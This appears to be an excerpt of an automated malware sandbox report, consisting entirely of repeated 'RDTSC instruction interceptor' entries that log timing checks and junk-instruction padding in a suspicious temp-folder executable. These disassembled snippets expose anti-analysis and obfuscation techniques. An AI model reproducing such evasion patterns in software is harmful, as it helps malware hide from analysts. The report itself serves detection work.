Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67B46 second address: D67B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67CD9 second address: D67CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67E75 second address: D67E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67E79 second address: D67E7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67E7E second address: D67ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FC9F53DFD66h 0x0000000b ja 00007FC9F53DFD56h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC9F53DFD62h 0x0000001b push eax 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e jmp 00007FC9F53DFD62h 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67ECD second address: D67EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Fh 0x00000007 jng 00007FC9F53C6A82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D67EE6 second address: D67EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6A305 second address: D6A309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6A309 second address: D6A30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6E23E second address: D6E261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC9F53C6A81h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6E3B0 second address: D6E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6E3B7 second address: D6E3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC9F53C6A76h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D6E3C1 second address: D6E3FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD68h 0x00000007 jmp 00007FC9F53DFD5Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007FC9F53DFD5Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D7FEDB second address: D7FEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FC9F53C6A76h 0x0000000c popad 0x0000000d jl 00007FC9F53C6A7Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D7FEF0 second address: D7FEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 ja 00007FC9F53DFD56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D7FEFD second address: D7FF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D8E920 second address: D8E92E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FC9F53DFD56h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D8E92E second address: D8E959 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9F53C6A7Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FC9F53C6A88h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA3B4 second address: DAA3CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD63h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA3CB second address: DAA3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA3D5 second address: DAA3E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC9F53DFD56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA3E0 second address: DAA3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA96BE second address: DA96C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9CA3 second address: DA9CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9DE9 second address: DA9DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9DED second address: DA9DF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9DF3 second address: DA9E32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Fh 0x00000007 jmp 00007FC9F53DFD5Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FC9F53DFD68h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9E32 second address: DA9E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53C6A7Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DA9F8A second address: DA9F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC9F53DFD56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAA0FB second address: DAA104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DABA00 second address: DABA04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DABA04 second address: DABA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC9F53C6A7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DACFFB second address: DAD027 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007FC9F53DFD56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jno 00007FC9F53DFD56h 0x00000013 jmp 00007FC9F53DFD60h 0x00000018 pop ebx 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAD027 second address: DAD02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAD02F second address: DAD034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFAC0 second address: DAFAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC9F53C6A8Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFAED second address: DAFAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFAF3 second address: DAFAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB4E second address: DAFB54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB54 second address: DAFB59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB59 second address: DAFB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53DFD60h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f cld 0x00000010 push 00000004h 0x00000012 sub dword ptr [ebp+122D1FAFh], esi 0x00000018 call 00007FC9F53DFD59h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB8B second address: DAFB95 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFB95 second address: DAFBB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC9F53DFD65h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFBB7 second address: DAFBBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFBBC second address: DAFBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e pushad 0x0000000f jno 00007FC9F53DFD56h 0x00000015 jmp 00007FC9F53DFD5Ch 0x0000001a popad 0x0000001b pop edi 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f je 00007FC9F53DFD5Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: DAFE1A second address: DAFE55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 ja 00007FC9F53C6A7Eh 0x0000000e mov edx, dword ptr [ebp+122D36C3h] 0x00000014 push dword ptr [ebp+1245E0A9h] 0x0000001a mov dword ptr [ebp+12478E5Fh], eax 0x00000020 call 00007FC9F53C6A79h 0x00000025 push eax 0x00000026 push edx 0x00000027 jne 00007FC9F53C6A78h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51301A9 second address: 513021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC9F53DFD64h 0x00000011 add cx, 9418h 0x00000016 jmp 00007FC9F53DFD5Bh 0x0000001b popfd 0x0000001c call 00007FC9F53DFD68h 0x00000021 jmp 00007FC9F53DFD62h 0x00000026 pop eax 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC9F53DFD5Ah 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513021B second address: 513021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513021F second address: 5130225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130225 second address: 513022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513022B second address: 513022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513022F second address: 5130233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110EA9 second address: 5110EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53DFD5Fh 0x00000009 jmp 00007FC9F53DFD63h 0x0000000e popfd 0x0000000f jmp 00007FC9F53DFD68h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110EF2 second address: 5110EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110EF8 second address: 5110F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD5Fh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110F14 second address: 5110F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FC9F53C6A83h 0x00000012 pop esi 0x00000013 mov ax, dx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110F4D second address: 5110F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110F53 second address: 5110F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FC9F53C6A88h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC9F53C6A87h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150DAF second address: 5150DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150DC6 second address: 5150DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F016F second address: 50F0175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0175 second address: 50F0179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0179 second address: 50F01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e call 00007FC9F53DFD69h 0x00000013 mov dl, ah 0x00000015 pop ebx 0x00000016 popad 0x00000017 push dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F01AD second address: 50F01B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F01B1 second address: 50F01B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B2E second address: 5110B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B32 second address: 5110B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B38 second address: 5110B61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC9F53C6A7Eh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FC9F53C6A7Ch 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B61 second address: 5110B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B67 second address: 5110BE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53C6A85h 0x00000009 or ax, 5FB6h 0x0000000e jmp 00007FC9F53C6A81h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC9F53C6A80h 0x0000001a sbb al, FFFFFFD8h 0x0000001d jmp 00007FC9F53C6A7Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FC9F53C6A86h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FC9F53C6A7Ah 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110BE1 second address: 5110BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110BE7 second address: 5110BEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51106C9 second address: 51106CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51106CF second address: 51106E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, 05h 0x00000011 mov bl, 94h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51106E9 second address: 51106F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51106F0 second address: 511075A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC9F53C6A87h 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC9F53C6A84h 0x00000016 add cx, E5F8h 0x0000001b jmp 00007FC9F53C6A7Bh 0x00000020 popfd 0x00000021 call 00007FC9F53C6A88h 0x00000026 mov bh, al 0x00000028 pop edi 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511075A second address: 511075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51105D3 second address: 51105F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51105F7 second address: 5110611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110611 second address: 5110627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110627 second address: 511062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511062B second address: 5110631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511033D second address: 5110341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
